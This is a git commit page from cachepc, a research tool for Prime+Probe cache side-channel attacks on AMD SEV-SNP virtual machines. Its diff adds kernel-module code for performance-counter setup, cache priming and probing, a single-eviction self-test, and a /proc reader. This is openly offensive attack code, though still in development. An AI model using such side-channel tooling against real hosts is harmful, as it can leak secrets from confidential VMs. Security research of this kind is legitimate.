Single eviction test with sleep - cachepc - Prime+Probe cache-based side-channel attack on AMD SEV-SNP protected virtual machines

	cachepc Prime+Probe cache-based side-channel attack on AMD SEV-SNP protected virtual machines
	git clone https://git.sinitax.com/sinitax/cachepc
	Log \| Files \| Refs \| Submodules \| README \| sfeed.txt

commit 8dc6462e70009c0bbcf0bbfcfd2d4494d3772580
parent 2558cb66b59aae1578fc46ff8edf5d7cf9383037
Author: Louis Burda <quent.burda@gmail.com>
Date:   Tue, 26 Jul 2022 17:16:10 +0200

Single eviction test with sleep

Diffstat:
M .gitignore  | 1 +
M Makefile  | 9 +++++++++
M patch.diff  | 80 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++-------------
A read.c  | 31 +++++++++++++++++++++++++++++++
M src/asm.h  | 46 ++++++++++++++++++++++++++++++++++------------
M src/cachepc.c  | 170 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++--------
M src/cachepc.h  | 137 +++++++++++++++++++++++++++++++++++++++++++++----------------------------------

7 files changed, 374 insertions(+), 100 deletions(-)
diff --git a/.gitignore b/.gitignore
@@ -2,3 +2,4 @@ build.sh
 push.sh
 *.o.cmd
 *.o
+read
diff --git a/Makefile b/Makefile
@@ -26,3 +26,12 @@ load:
 	sudo rmmod kvm || true
 	sudo insmod $(KERNEL_SOURCE)/arch/x86/kvm/kvm.ko
 	sudo insmod $(KERNEL_SOURCE)/arch/x86/kvm/kvm-amd.ko
+
+read: read.c
+	$(CC) -o $@ $<
+
+test: load read
+	@./read
+
+update: 
+	git -C $(KERNEL_SOURCE) diff > patch.diff
diff --git a/patch.diff b/patch.diff
@@ -81,7 +81,7 @@ index 7b3cfbe8f7e3..71697d08e9e4 100644
  }
  
 diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
-index 2541a17ff1c4..c219a214d904 100644
+index 2541a17ff1c4..757128b13fe5 100644
 --- a/virt/kvm/kvm_main.c
 +++ b/virt/kvm/kvm_main.c
 @@ -51,6 +51,9 @@
@@ -103,21 +103,26 @@ index 2541a17ff1c4..c219a214d904 100644
  MODULE_AUTHOR("Qumranet");
  MODULE_LICENSE("GPL");
  
-@@ -143,6 +148,13 @@ static void hardware_disable_all(void);
+@@ -143,6 +148,18 @@ static void hardware_disable_all(void);
  
  static void kvm_io_bus_destroy(struct kvm_io_bus *bus);
  
-+uint8_t *cachepc_msrmts;
-+size_t cachepc_msrmts_count;
 +struct proc_ops cachepc_proc_ops;
 +
++uint16_t *cachepc_msrmts;
++size_t cachepc_msrmts_count;
 +EXPORT_SYMBOL(cachepc_msrmts);
 +EXPORT_SYMBOL(cachepc_msrmts_count);
 +
++cache_ctx *cachepc_ctx;
++cacheline *cachepc_ds;
++EXPORT_SYMBOL(cachepc_ctx);
++EXPORT_SYMBOL(cachepc_ds);
++
  __visible bool kvm_rebooting;
  EXPORT_SYMBOL_GPL(kvm_rebooting);
  
-@@ -4765,6 +4777,50 @@ static void check_processor_compat(void *data)
+@@ -4765,12 +4782,94 @@ static void check_processor_compat(void *data)
  	*c->ret = kvm_arch_check_processor_compat(c->opaque);
  }
  
@@ -141,14 +146,16 @@ index 2541a17ff1c4..c219a214d904 100644
 +kvm_cachepc_read(struct file *file, char *buf, size_t buflen, loff_t *off)
 +{
 +	size_t len, left;
++	size_t size;
 +
 +	printk(KERN_WARNING "CacheSC: Reading entries (%lu:%lli)\n",
 +		buflen, off ? *off : 0);
 +
-+	if (!off || *off >= cachepc_msrmts_count || *off < 0)
++	size = cachepc_msrmts_count * sizeof(uint16_t);
++	if (!off || *off >= size || *off < 0)
 +		return 0;
 +
-+	len = cachepc_msrmts_count - *off;
++	len = size - *off;
 +	if (len > buflen) len = buflen;
 +
 +	left = copy_to_user(buf, cachepc_msrmts + *off, len);
@@ -165,37 +172,84 @@ index 2541a17ff1c4..c219a214d904 100644
 +	return 0;
 +}
 +
++void
++kvm_cachepc_single_eviction_test(void *p)
++{
++	cacheline *head;
++        cacheline *ptr;
++
++	ptr = cachepc_prepare_victim(cachepc_ctx, 5);
++	head = cachepc_prime(cachepc_ds);
++	cachepc_victim(ptr);
++	cachepc_probe(head);
++
++	printk(KERN_WARNING "CachePC: Test done, results:");
++	cachepc_print_msrmts(head);
++	cachepc_save_msrmts(head);
++
++	cachepc_release_victim(cachepc_ctx, ptr);
++}
++
++void
++kvm_cachepc_init(void *p)
++{
++	int cpu;
++
++	cpu = get_cpu();
++
++	printk(KERN_WARNING "CachePC: Running on core %i\n", cpu);
++
++	cachepc_init_counters();
++
++	cachepc_ctx = cachepc_get_ctx(L1);
++	cachepc_ds = cachepc_prepare_ds(cachepc_ctx);
++
++	kvm_cachepc_single_eviction_test(p);
++
++	put_cpu();
++}
++
  int kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align,
  		  struct module *module)
  {
-@@ -4848,6 +4904,20 @@ int kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align,
+ 	struct kvm_cpu_compat_check c;
+-	int r;
+-	int cpu;
++	int r, cpu;
+ 
+ 	r = kvm_arch_init(opaque);
+ 	if (r)
+@@ -4848,6 +4947,20 @@ int kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align,
  	r = kvm_vfio_ops_init();
  	WARN_ON(r);
  
-+	cachepc_init_counters();
-+
 +	cachepc_msrmts_count = L1_SETS;
-+	cachepc_msrmts = kzalloc(cachepc_msrmts_count, GFP_KERNEL);
++	cachepc_msrmts = kzalloc(cachepc_msrmts_count * sizeof(uint16_t), GFP_KERNEL);
 +	BUG_ON(cachepc_msrmts == NULL);
 +
++	r = smp_call_function_single(2, kvm_cachepc_init, NULL, true);
++	WARN_ON(r != 0);
++
 +	memset(&cachepc_proc_ops, 0, sizeof(cachepc_proc_ops));
 +	cachepc_proc_ops.proc_open = kvm_cachepc_open;
 +	cachepc_proc_ops.proc_read = kvm_cachepc_read;
 +	cachepc_proc_ops.proc_write = kvm_cachepc_write;
 +	cachepc_proc_ops.proc_release = kvm_cachepc_close;
-+
 +	proc_create("cachepc", 0644, NULL, &cachepc_proc_ops);
 +	
  	return 0;
  
  out_unreg:
-@@ -4872,6 +4942,9 @@ EXPORT_SYMBOL_GPL(kvm_init);
+@@ -4872,6 +4985,12 @@ EXPORT_SYMBOL_GPL(kvm_init);
  
  void kvm_exit(void)
  {
 +	remove_proc_entry("cachepc", NULL);
 +	kfree(cachepc_msrmts);
 +
++	cachepc_release_ds(cachepc_ctx, cachepc_ds);
++	cachepc_release_ctx(cachepc_ctx);
++
  	debugfs_remove_recursive(kvm_debugfs_dir);
  	misc_deregister(&kvm_dev);
  	kmem_cache_destroy(kvm_vcpu_cache);
diff --git a/read.c b/read.c
@@ -0,0 +1,31 @@
+#include <stdlib.h>
+#include <stdio.h>
+#include <fcntl.h>
+#include <stdint.h>
+#include <assert.h>
+#include <unistd.h>
+
+int
+main(int argc, const char **argv)
+{
+	uint16_t counts[64];
+	size_t i, len;
+	int fd;
+
+	fd = open("/proc/cachepc", O_RDONLY);
+	len = read(fd, counts, sizeof(counts));
+	assert(len == sizeof(counts));
+
+	for (i = 0; i < 64; i++) {
+		if (i % 16 == 0 && i)
+			printf("\n");
+		if (counts[i] > 0)
+			printf("\x1b[91m");
+		printf("%2i ", i);
+		if (counts[i] > 0)
+			printf("\x1b[0m");
+	}
+	printf("\n");
+	
+	close(fd);
+}
diff --git a/src/asm.h b/src/asm.h
@@ -19,6 +19,12 @@ static inline void cachepc_sfence(void);
 __attribute__((always_inline))
 static inline void cachepc_mfence(void);
 
+__attribute__((always_inline))
+static inline void cachepc_readq(void *p);
+
+__attribute__((always_inline))
+static inline void cachepc_victim(void *p);
+
 uint64_t
 cachepc_readpmc(uint64_t event)
 {
@@ -46,26 +52,42 @@ cachepc_cpuid(void)
 void
 cachepc_lfence(void)
 {
-    asm volatile(
-        "lfence\n\t"
-        ::
-    );
+	asm volatile(
+		"lfence\n\t"
+		::
+	);
 }
 
 void
 cachepc_sfence(void)
 {
-    asm volatile(
-        "sfence\n\t"
-        ::
-    );
+	asm volatile(
+		"sfence\n\t"
+		::
+	);
 }
 
 void
 cachepc_mfence(void)
 {
-    asm volatile(
-        "mfence\n\t"
-        ::
-    );
+	asm volatile(
+		"mfence\n\t"
+		::
+	);
+}
+
+void
+cachepc_readq(void *p)
+{
+	asm volatile (
+		"movq (%0), %%r10\n\t"
+		: : "r" (p) : "r10"
+	);
+}
+
+void
+cachepc_victim(void *p)
+{
+	cachepc_mfence();
+	cachepc_readq(p);
 }
diff --git a/src/cachepc.c b/src/cachepc.c
@@ -1,5 +1,10 @@
 #include "cachepc.h"
 
+static void cl_insert(cacheline *last_cl, cacheline *new_cl);
+static void *remove_cache_set(cache_ctx *ctx, void *ptr);
+static void *remove_cache_group_set(void *ptr);
+
+static cacheline *prepare_cache_set_ds(cache_ctx *ctx, uint32_t *set, uint32_t sets_len);
 static cacheline *build_cache_ds(cache_ctx *ctx, cacheline **cacheline_ptr_arr);
 static void build_randomized_list_for_cache_set(cache_ctx *ctx, cacheline **cacheline_ptr_arr);
 static cacheline **allocate_cache_ds(cache_ctx *ctx);
@@ -9,7 +14,7 @@ static void *aligned_alloc(size_t alignment, size_t size);
 void
 cachepc_init_counters(void)
 {
-	uint32_t event, event_no, event_mask;
+	uint64_t event, event_no, event_mask;
 	uint64_t reg_addr;
 
 	/* SEE: https://developer.amd.com/resources/developer-guides-manuals (PPR 17H 31H, P.166)
@@ -20,22 +25,24 @@ cachepc_init_counters(void)
 	 * 6 slots total
 	 */
        
-	reg_addr = 0xc0010200; /* first slot */
+	reg_addr = 0xc0010200;
 	event_no = 0x64;
 	event_mask = 0x08;
 	event = event_no | (event_mask << 8);
-	event |= (1<< 17); /* OsUserMode bit */
-	event |= (1 << 22); /* enable performance counter */
-	printk(KERN_WARNING "CachePC: Initialized event %d\n", event);
+	event |= (1ULL << 17); /* OS (kernel) events only */
+	event |= (1ULL << 22); /* enable performance counter */
+	event |= (1ULL << 40); /* Host events only */
+	printk(KERN_WARNING "CachePC: Initialized event %llu\n", event);
 	asm volatile ("wrmsr" : : "c"(reg_addr), "a"(event), "d"(0x00));
 
 	reg_addr = 0xc0010202;
 	event_no = 0x64;
-	event_mask = 0xC8;
+	event_mask = 0xF0;
 	event = event_no | (event_mask << 8); 
-	event |= (1 << 17); /* OsUserMode bit */
-	event |= (1 << 22); /* enable performance counter */
-	printk(KERN_WARNING "CachePC: Initialized event %d\n", event);
+	event |= (1ULL << 17); /* OS (kernel) events only */
+	event |= (1ULL << 22); /* enable performance counter */
+	event |= (1ULL << 40); /* Host events only */
+	printk(KERN_WARNING "CachePC: Initialized event %llu\n", event);
 	asm volatile ("wrmsr" : : "c"(reg_addr), "a"(event), "d"(0x00));
 }
 
@@ -74,6 +81,13 @@ cachepc_get_ctx(cache_level cache_level)
 	return ctx;
 }
 
+void
+cachepc_release_ctx(cache_ctx *ctx)
+{
+	kfree(ctx);
+}
+
+
 /*
  * Initialises the complete cache data structure for the given context
  */
@@ -95,6 +109,42 @@ cachepc_prepare_ds(cache_ctx *ctx)
 }
 
 void
+cachepc_release_ds(cache_ctx *ctx, cacheline *ds)
+{
+	kfree(remove_cache_set(ctx, ds));
+}
+
+cacheline *
+cachepc_prepare_victim(cache_ctx *ctx, uint32_t set)
+{
+	cacheline *victim_set, *victim_cl;
+	cacheline *curr_cl, *next_cl;
+
+	victim_set = prepare_cache_set_ds(ctx, &set, 1);
+	victim_cl = victim_set;
+
+	// Free the other lines in the same set that are not used.
+	if (ctx->addressing == PHYSICAL) {
+		curr_cl = victim_cl->next;
+		do {
+			next_cl = curr_cl->next;
+			// Here, it is ok to free them directly, as every line in the same
+			// set is from a different page anyway.
+			kfree(remove_cache_group_set(curr_cl));
+			curr_cl = next_cl;
+		} while(curr_cl != victim_cl);
+	}
+
+	return victim_cl;
+}
+
+void
+cachepc_release_victim(cache_ctx *ctx, cacheline *victim)
+{
+	kfree(remove_cache_set(ctx, victim));
+}
+
+void
 cachepc_save_msrmts(cacheline *head)
 {
 	cacheline *curr_cl;
@@ -126,23 +176,109 @@ cachepc_print_msrmts(cacheline *head)
 	} while (curr_cl != head);
 }
 
+
+cacheline *
+prepare_cache_set_ds(cache_ctx *ctx, uint32_t *sets, uint32_t sets_len)
+{
+	cacheline *cache_ds, **first_cl_in_sets, **last_cl_in_sets;
+	cacheline *to_del_cls, *curr_cl, *next_cl, *cache_set_ds;
+	uint32_t i, cache_groups_len, cache_groups_max_len;
+	uint32_t *cache_groups;
+       
+	cache_ds = cachepc_prepare_ds(ctx);
+
+	first_cl_in_sets = kzalloc(ctx->sets * sizeof(cacheline *), GFP_KERNEL);
+	BUG_ON(first_cl_in_sets == NULL);
+
+	last_cl_in_sets  = kzalloc(ctx->sets * sizeof(cacheline *), GFP_KERNEL);
+	BUG_ON(last_cl_in_sets == NULL);
+
+	// Find the cache groups that are used, so that we can delete the other ones
+	// later (to avoid memory leaks)
+	cache_groups_max_len = ctx->sets / CACHE_GROUP_SIZE;
+	cache_groups = kmalloc(cache_groups_max_len * sizeof(uint32_t), GFP_KERNEL);
+	BUG_ON(cache_groups == NULL);
+
+	cache_groups_len = 0;
+	for (i = 0; i < sets_len; ++i) {
+		if (!is_in_arr(sets[i] / CACHE_GROUP_SIZE, cache_groups, cache_groups_len)) {
+			cache_groups[cache_groups_len] = sets[i] / CACHE_GROUP_SIZE;
+			++cache_groups_len;
+		}
+	}
+
+	to_del_cls = NULL;
+	curr_cl = cache_ds;
+
+	// Extract the partial data structure for the cache sets and ensure correct freeing
+	do {
+		next_cl = curr_cl->next;
+
+		if (IS_FIRST(curr_cl->flags)) {
+			first_cl_in_sets[curr_cl->cache_set] = curr_cl;
+		}
+		if (IS_LAST(curr_cl->flags)) {
+			last_cl_in_sets[curr_cl->cache_set] = curr_cl;
+		}
+
+		if (ctx->addressing == PHYSICAL && !is_in_arr(
+			curr_cl->cache_set / CACHE_GROUP_SIZE, cache_groups, cache_groups_len))
+		{
+			// Already free all unused blocks of the cache ds for physical
+			// addressing, because we loose their refs
+			cl_insert(to_del_cls, curr_cl);
+			to_del_cls = curr_cl;
+		}
+		curr_cl = next_cl;
+
+	} while(curr_cl != cache_ds);
+
+	// Fix partial cache set ds
+	for (i = 0; i < sets_len; ++i) {
+		last_cl_in_sets[sets[i]]->next = first_cl_in_sets[sets[(i + 1) % sets_len]];
+		first_cl_in_sets[sets[(i + 1) % sets_len]]->prev = last_cl_in_sets[sets[i]];
+	}
+	cache_set_ds = first_cl_in_sets[sets[0]];
+
+	// Free unused cache lines
+	if (ctx->addressing == PHYSICAL) {
+		cachepc_release_ds(ctx, to_del_cls);
+	}
+
+	kfree(first_cl_in_sets);
+	kfree(last_cl_in_sets);
+	kfree(cache_groups);
+
+	return cache_set_ds;
+}
+
+void 
+cl_insert(cacheline *last_cl, cacheline *new_cl)
+{
+    if (last_cl == NULL) {
+        // Adding the first entry is a special case
+        new_cl->next = new_cl;
+        new_cl->prev = new_cl;
+    } else {
+        new_cl->next = last_cl->next;
+        new_cl->prev = last_cl;
+        last_cl->next->prev = new_cl;
+        last_cl->next = new_cl;
+    }
+}
+
 void *
 remove_cache_set(cache_ctx *ctx, void *ptr)
 {
 	return (void *) (((uintptr_t) ptr) & ~SET_MASK(ctx->sets));
 }
 
-void
-cachepc_release_ds(cache_ctx *ctx, cacheline *ds)
+void *
+remove_cache_group_set(void *ptr)
 {
-	kfree(remove_cache_set(ctx, ds));
+	return (void *) (((uintptr_t) ptr) & ~SET_MASK(CACHE_GROUP_SIZE));
 }
 
-void
-cachepc_release_ctx(cache_ctx *ctx)
-{
-	kfree(ctx);
-}
 
 /*
  * Create a randomized doubly linked list with the following structure:
diff --git a/src/cachepc.h b/src/cachepc.h
@@ -3,22 +3,28 @@
 #include <linux/kernel.h>
 #include <linux/types.h> 
 #include <linux/slab.h>
+#include <linux/delay.h>
 
 #include "asm.h"
 #include "cache_types.h"
 #include "util.h"
 
-#define L2_HIT_CNTR 0xC0010201
-#define L2_MISS_CNTR 0xC0010203
+#define L2_MISS_CNTR 0xC0010201
+#define L2_HIT_CNTR 0xC0010203
 
 void cachepc_init_counters(void);
 
 cache_ctx *cachepc_get_ctx(cache_level cl);
+void cachepc_release_ctx(cache_ctx *ctx);
+
 cacheline *cachepc_prepare_ds(cache_ctx *ctx);
+void cachepc_release_ds(cache_ctx *ctx, cacheline *ds);
+
+cacheline *cachepc_prepare_victim(cache_ctx *ctx, uint32_t set);
+void cachepc_release_victim(cache_ctx *ctx, cacheline *ptr);
+
 void cachepc_save_msrmts(cacheline *head);
 void cachepc_print_msrmts(cacheline *head);
-void cachepc_release_ds(cache_ctx *ctx, cacheline *ds);
-void cachepc_release_ctx(cache_ctx *ctx);
 
 __attribute__((always_inline))
 static inline cacheline *cachepc_prime(cacheline *head);
@@ -26,20 +32,23 @@ static inline cacheline *cachepc_prime(cacheline *head);
 __attribute__((always_inline))
 static inline cacheline *cachepc_prime_rev(cacheline *head);
 
-__attribute__((always_inline))
-static inline cacheline *cachepc_probe_set(cacheline *curr_cl);
+//__attribute__((always_inline))
+//static inline cacheline *cachepc_probe_set(cacheline *curr_cl);
 
 __attribute__((always_inline))
 static inline cacheline *cachepc_probe(cacheline *head);
 
-extern uint8_t *cachepc_msrmts;
+extern uint16_t *cachepc_msrmts;
 extern size_t cachepc_msrmts_count;
 
+extern cache_ctx *cachepc_ctx;
+extern cacheline *cachepc_ds;
+
 /*
  * Prime phase: fill the target cache (encoded in the size of the data structure)
  * with the prepared data structure, i.e. with attacker data.
  */
-static inline cacheline *
+cacheline *
 cachepc_prime(cacheline *head)
 {
     cacheline *curr_cl;
@@ -73,7 +82,7 @@ cachepc_prime(cacheline *head)
  *             A) An evicted set is L2_ACCESS_TIME - L1_ACCESS_TIME slower
  *             B) An evicted set is L3_ACCESS_TIME - L2_ACCESS_TIME slower
  */
-static inline cacheline *
+cacheline *
 cachepc_prime_rev(cacheline *head)
 {
     cacheline *curr_cl;
@@ -89,61 +98,73 @@ cachepc_prime_rev(cacheline *head)
     return curr_cl->prev;
 }
 
-static inline cacheline *
-cachepc_probe_set(cacheline *curr_cl)
+cacheline *
+cachepc_probe(cacheline *start_cl)
 {
 	uint64_t pre1, pre2;
 	uint64_t post1, post2;
 	cacheline *next_cl;
+	cacheline *curr_cl;
 
-	pre1 = cachepc_readpmc(L2_HIT_CNTR);
-	pre2 = cachepc_readpmc(L2_MISS_CNTR);
-
-	cachepc_mfence();
-	asm volatile(
-		"mov 8(%[curr_cl]), %%rax \n\t"              // +8
-		"mov 8(%%rax), %%rcx \n\t"                   // +16
-		"mov 8(%%rcx), %%rax \n\t"                   // +24
-		"mov 8(%%rax), %%rcx \n\t"                   // +32
-		"mov 8(%%rcx), %%rax \n\t"                   // +40
-		"mov 8(%%rax), %%rcx \n\t"                   // +48
-		"mov 8(%%rcx), %[curr_cl_out] \n\t"          // +56
-		"mov 8(%[curr_cl_out]), %[next_cl_out] \n\t" // +64
-		: [next_cl_out] "=r" (next_cl),
-		  [curr_cl_out] "=r" (curr_cl)
-		: [curr_cl] "r" (curr_cl)
-		: "rax", "rcx"
-	);
-	cachepc_mfence();
-	cachepc_cpuid();
-
-	post1 = cachepc_readpmc(L2_HIT_CNTR);
-	cachepc_cpuid();
-	post2 = cachepc_readpmc(L2_MISS_CNTR);
-	cachepc_cpuid();
-
-	/* works across size boundary */
-	curr_cl->count = 0;
-	curr_cl->count += post1 - pre1;
-	curr_cl->count += post2 - pre2;
-
-	return next_cl;
-}
+	curr_cl = start_cl;
 
-static inline cacheline *
-cachepc_probe(cacheline *head)
-{
-	cacheline *curr_cs;
-
-	//printk(KERN_WARNING "CachePC: Probing..");
-       
-	curr_cs = head;
 	do {
-		curr_cs = cachepc_probe_set(curr_cs);
-	} while (__builtin_expect(curr_cs != head, 1));
-
-	//printk(KERN_WARNING "CachePC: Probing done");
-
-	return curr_cs->next;
+		cachepc_cpuid();
+		cachepc_mfence();
+	
+		asm volatile(
+			"mov 8(%[curr_cl]), %%rax \n\t"              // +8
+			"mov 8(%%rax), %%rcx \n\t"                   // +16
+			"mov 8(%%rcx), %%rax \n\t"                   // +24
+			"mov 8(%%rax), %%rcx \n\t"                   // +32
+			"mov 8(%%rcx), %%rax \n\t"                   // +40
+			"mov 8(%%rax), %%rcx \n\t"                   // +48
+			"mov 8(%%rcx), %[curr_cl_out] \n\t"          // +56
+			"mov 8(%[curr_cl_out]), %[next_cl_out] \n\t" // +64
+			: [next_cl_out] "=r" (next_cl),
+			  [curr_cl_out] "=r" (curr_cl)
+			: [curr_cl] "r" (curr_cl)
+			: "rax", "rcx"
+		);
+
+		cachepc_cpuid();
+		cachepc_mfence();
+
+		pre1 = cachepc_readpmc(L2_HIT_CNTR);
+		pre2 = cachepc_readpmc(L2_MISS_CNTR);
+
+		cachepc_cpuid();
+		cachepc_mfence();
+
+		msleep(100);
+
+		post1 = cachepc_readpmc(L2_HIT_CNTR);
+		cachepc_cpuid();
+		post2 = cachepc_readpmc(L2_MISS_CNTR);
+		cachepc_cpuid();
+
+		/* works across size boundary */
+		curr_cl->count = 0;
+		curr_cl->count += post1 - pre1;
+		curr_cl->count += post2 - pre2;
+	} while (__builtin_expect(curr_cl != start_cl, 1));
+
+	return curr_cl->next;
 }
 
+// static inline cacheline *
+// cachepc_probe(cacheline *head)
+// {
+// 	cacheline *curr_cs;
+// 
+// 	//printk(KERN_WARNING "CachePC: Probing..");
+//        
+// 	curr_cs = head;
+// 	do {
+// 		curr_cs = cachepc_probe_set(curr_cs);
+// 	} while (__builtin_expect(curr_cs != head, 1));
+// 
+// 	//printk(KERN_WARNING "CachePC: Probing done");
+// 
+// 	return curr_cs->next;
+// }

M	.gitignore	\|	1	+
M	Makefile	\|	9	+++++++++
M	patch.diff	\|	80	++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++-------------
A	read.c	\|	31	+++++++++++++++++++++++++++++++
M	src/asm.h	\|	46	++++++++++++++++++++++++++++++++++------------
M	src/cachepc.c	\|	170	+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++--------
M	src/cachepc.h	\|	137	+++++++++++++++++++++++++++++++++++++++++++++----------------------------------